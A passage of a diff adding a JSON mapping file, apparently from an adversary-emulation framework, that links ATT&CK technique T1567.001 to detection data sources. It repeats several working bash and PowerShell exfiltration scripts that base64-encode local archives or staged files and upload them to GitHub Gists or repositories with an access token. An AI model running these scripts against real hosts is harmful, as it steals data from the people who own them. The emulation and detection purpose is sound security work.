+ "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + 
"definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": 
"api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1567.001", + "command_list": [ + "GHUser=\"#{github.user.name}\";\nGHPAT=\"#{github.access.token}\";\nFileContent=$(base64 #{host.dir.compress});\nLocalFile='#{host.dir.compress}';\nRemoteFile=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ntmp_file=$(mktemp);\necho \"{\\\"public\\\": false,\\\"files\\\": {\\\"$RemoteFile\\\": {\\\"content\\\": \\\"${FileContent}\\\"}}}\" > $tmp_file;\ncurl --silent --output /dev/null --show-error --fail -X POST -d @$tmp_file -u $GHUser:$GHPAT https://api.github.com/gists;\nrm $tmp_file\n", + "$GHUser = \"#{github.user.name}\";\n$GHPAT = \"#{github.access.token}\";\n$File = Get-Item -Path \"#{host.dir.compress}\";\n$Token = $GHUser + \":\" + $GHPAT;\n$EncodedToken = [System.Convert]::ToBase64String([char[]]$Token);\n\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-paw-$($File.name)\";\n$FileContent = [Convert]::ToBase64String([IO.File]::ReadAllBytes($File));\n\n$StringContent = @{\n files = @{$RemoteName = @{content = $FileContent}};\n public = $False;\n} | ConvertTo-Json;\n$URL = \"https://api.github.com/gists\";\n$Body = $StringContent;\n$Headers = @{\n \"content-type\" = \"application/json\";\n \"Authorization\" = 'Basic {0}' -f 
$EncodedToken;\n};\nInvoke-WebRequest -Uri $URL -Method POST -Body $Body -Headers $Headers 1>$null -UseBasicParsing;\n", + "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalFile='#{host.dir.compress}';\nHeader=\"Authorization: token $GHPAT\";\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\necho \"{\\\"message\\\":\\\"Committed $RemoteName\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\nbase64 -w 0 $LocalFile >>/tmp/b64;\necho \"\\\"}\" >>/tmp/b64;\ncontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\nrm /tmp/b64;\n", + "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n$file = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n$uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n\n$FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n$Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n$Body = @{\n path = $RemoteName;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $RemoteName;\n} | ConvertTo-Json;\ntry {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n} catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n}\n", + 
"GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalDirectory=#{host.dir.staged};\nHeader=\"Authorization: token $GHPAT\";\n\nfor file in $LocalDirectory/*.*; do\n TempName=$(echo $file | sed \"s/ /-/g\")\n\tRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename \"$TempName\")\";\n\techo \"{\\\"message\\\":\\\"Committed $(basename $TempName) at: $(date)\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\n base64 -w 0 \"$file\" >>/tmp/b64;\n echo \"\\\"}\" >>/tmp/b64;\n\tcontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\n rm /tmp/b64;\ndone;\n", + "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$LocalDirectory = \"#{host.dir.staged}\";\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n\n$Files = Get-ChildItem $LocalDirectory;\nforeach ($file in $Files){\n $RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n $uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n $FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n $Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n $Body = @{\n path = $file.Name;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $file.name + \" at: \" + (Get-Date);\n } | ConvertTo-Json;\n try {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n } catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n else { $content = Invoke-RestMethod 
-Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue; }\n }\n};\n" + ], + "commands": [ + { + "command": "GHUser=\"#{github.user.name}\";\nGHPAT=\"#{github.access.token}\";\nFileContent=$(base64 #{host.dir.compress});\nLocalFile='#{host.dir.compress}';\nRemoteFile=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ntmp_file=$(mktemp);\necho \"{\\\"public\\\": false,\\\"files\\\": {\\\"$RemoteFile\\\": {\\\"content\\\": \\\"${FileContent}\\\"}}}\" > $tmp_file;\ncurl --silent --output /dev/null --show-error --fail -X POST -d @$tmp_file -u $GHUser:$GHPAT https://api.github.com/gists;\nrm $tmp_file\n", + "source": "data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml", + "name": "This ability exfiltrates a compressed archive to Github Gists (Base64 Encoded). To reconstitute, save\nthe base64 string from the Gist and run ----\n(Powershell) [Convert]::FromBase64String($(Get-Content b64.txt)) | set-content archive.extension -encoding byte ----\n(Linux) cat b64.txt | base64 -d > archive.extension\n" + }, + { + "command": "$GHUser = \"#{github.user.name}\";\n$GHPAT = \"#{github.access.token}\";\n$File = Get-Item -Path \"#{host.dir.compress}\";\n$Token = $GHUser + \":\" + $GHPAT;\n$EncodedToken = [System.Convert]::ToBase64String([char[]]$Token);\n\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-paw-$($File.name)\";\n$FileContent = [Convert]::ToBase64String([IO.File]::ReadAllBytes($File));\n\n$StringContent = @{\n files = @{$RemoteName = @{content = $FileContent}};\n public = $False;\n} | ConvertTo-Json;\n$URL = \"https://api.github.com/gists\";\n$Body = $StringContent;\n$Headers = @{\n \"content-type\" = \"application/json\";\n \"Authorization\" = 'Basic {0}' -f $EncodedToken;\n};\nInvoke-WebRequest -Uri $URL -Method POST -Body $Body -Headers $Headers 1>$null -UseBasicParsing;\n", + "source": "data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml", + "name": "This ability exfiltrates a 
compressed archive to Github Gists (Base64 Encoded). To reconstitute, save\nthe base64 string from the Gist and run ----\n(Powershell) [Convert]::FromBase64String($(Get-Content b64.txt)) | set-content archive.extension -encoding byte ----\n(Linux) cat b64.txt | base64 -d > archive.extension\n" + }, + { + "command": "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalFile='#{host.dir.compress}';\nHeader=\"Authorization: token $GHPAT\";\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\necho \"{\\\"message\\\":\\\"Committed $RemoteName\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\nbase64 -w 0 $LocalFile >>/tmp/b64;\necho \"\\\"}\" >>/tmp/b64;\ncontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\nrm /tmp/b64;\n", + "source": "data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml", + "name": "This will exfiltrate a given compressed directory to a GitHub repository. It assumes that all the facts supplied are valid." 
+ }, + { + "command": "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n$file = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n$uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n\n$FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n$Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n$Body = @{\n path = $RemoteName;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $RemoteName;\n} | ConvertTo-Json;\ntry {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n} catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n}\n", + "source": "data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml", + "name": "This will exfiltrate a given compressed directory to a GitHub repository. It assumes that all the facts supplied are valid." 
+ }, + { + "command": "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalDirectory=#{host.dir.staged};\nHeader=\"Authorization: token $GHPAT\";\n\nfor file in $LocalDirectory/*.*; do\n TempName=$(echo $file | sed \"s/ /-/g\")\n\tRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename \"$TempName\")\";\n\techo \"{\\\"message\\\":\\\"Committed $(basename $TempName) at: $(date)\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\n base64 -w 0 \"$file\" >>/tmp/b64;\n echo \"\\\"}\" >>/tmp/b64;\n\tcontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\n rm /tmp/b64;\ndone;\n", + "source": "data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml", + "name": "This ability will exfiltrate all files in a set staged directory to a repository in GitHub.\n" + }, + { + "command": "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$LocalDirectory = \"#{host.dir.staged}\";\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n\n$Files = Get-ChildItem $LocalDirectory;\nforeach ($file in $Files){\n $RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n $uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n $FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n $Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n $Body = @{\n path = $file.Name;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $file.name + \" at: \" + (Get-Date);\n } | ConvertTo-Json;\n 
try {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n } catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n else { $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue; }\n }\n};\n", + "source": "data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml", + "name": "This ability will exfiltrate all files in a set staged directory to a repository in GitHub.\n" + } + ], + "parsed_datasets": [ + { + "id": "0582dc26-e0cf-4645-88cf-f37a02279976", + "name": "Exfil Compressed Archive to Github Gist", + "description": "This ability exfiltrates a compressed archive to Github Gists (Base64 Encoded). To reconstitute, save\nthe base64 string from the Gist and run ----\n(Powershell) [Convert]::FromBase64String($(Get-Content b64.txt)) | set-content archive.extension -encoding byte ----\n(Linux) cat b64.txt | base64 -d > archive.extension\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.001", + "name": "Exfiltration to Code Repository" + }, + "platforms": { + "linux": { + "sh": { + "command": "GHUser=\"#{github.user.name}\";\nGHPAT=\"#{github.access.token}\";\nFileContent=$(base64 #{host.dir.compress});\nLocalFile='#{host.dir.compress}';\nRemoteFile=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ntmp_file=$(mktemp);\necho \"{\\\"public\\\": false,\\\"files\\\": {\\\"$RemoteFile\\\": {\\\"content\\\": \\\"${FileContent}\\\"}}}\" > $tmp_file;\ncurl --silent --output /dev/null --show-error --fail -X POST -d @$tmp_file -u $GHUser:$GHPAT https://api.github.com/gists;\nrm $tmp_file\n" + } + }, + "windows": { + "psh": { + "command": "$GHUser = \"#{github.user.name}\";\n$GHPAT = \"#{github.access.token}\";\n$File = Get-Item -Path \"#{host.dir.compress}\";\n$Token = $GHUser + \":\" + $GHPAT;\n$EncodedToken = [System.Convert]::ToBase64String([char[]]$Token);\n\n$RemoteName = \"$(Get-Date -Format 
yyyymmddhhmmss)-exfil-paw-$($File.name)\";\n$FileContent = [Convert]::ToBase64String([IO.File]::ReadAllBytes($File));\n\n$StringContent = @{\n files = @{$RemoteName = @{content = $FileContent}};\n public = $False;\n} | ConvertTo-Json;\n$URL = \"https://api.github.com/gists\";\n$Body = $StringContent;\n$Headers = @{\n \"content-type\" = \"application/json\";\n \"Authorization\" = 'Basic {0}' -f $EncodedToken;\n};\nInvoke-WebRequest -Uri $URL -Method POST -Body $Body -Headers $Headers 1>$null -UseBasicParsing;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + }, + { + "id": "4a1120a5-971c-457f-bb07-60641b4723fd", + "name": "Exfil Compressed Archive to Github Repository", + "description": "This will exfiltrate a given compressed directory to a GitHub repository. It assumes that all the facts supplied are valid.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.001", + "name": "Exfiltration to Code Repository" + }, + "platforms": { + "linux": { + "sh": { + "command": "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalFile='#{host.dir.compress}';\nHeader=\"Authorization: token $GHPAT\";\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\necho \"{\\\"message\\\":\\\"Committed $RemoteName\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\nbase64 -w 0 $LocalFile >>/tmp/b64;\necho \"\\\"}\" >>/tmp/b64;\ncontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\nrm /tmp/b64;\n" + } + }, + "windows": { + "psh,pwsh": { + "command": "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$token = 
$GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n$file = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n$uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n\n$FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n$Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n$Body = @{\n path = $RemoteName;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $RemoteName;\n} | ConvertTo-Json;\ntry {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n} catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + }, + { + "id": "a201bec2-a193-4b58-bf0e-57fa621da474", + "name": "Exfil Directory Files to GitHub", + "description": "This ability will exfiltrate all files in a set staged directory to a repository in GitHub.\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.001", + "name": "Exfiltration to Code Repository" + }, + "platforms": { + "linux": { + "sh": { + "command": "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalDirectory=#{host.dir.staged};\nHeader=\"Authorization: token $GHPAT\";\n\nfor file in $LocalDirectory/*.*; do\n TempName=$(echo $file | sed \"s/ /-/g\")\n\tRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename \"$TempName\")\";\n\techo \"{\\\"message\\\":\\\"Committed $(basename $TempName) at: $(date)\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\n base64 -w 0 \"$file\" 
>>/tmp/b64;\n echo \"\\\"}\" >>/tmp/b64;\n\tcontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\n rm /tmp/b64;\ndone;\n" + } + }, + "windows": { + "psh,pwsh": { + "command": "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$LocalDirectory = \"#{host.dir.staged}\";\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n\n$Files = Get-ChildItem $LocalDirectory;\nforeach ($file in $Files){\n $RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n $uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n $FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n $Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n $Body = @{\n path = $file.Name;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $file.name + \" at: \" + (Get-Date);\n } | ConvertTo-Json;\n try {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n } catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n else { $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue; }\n }\n};\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was 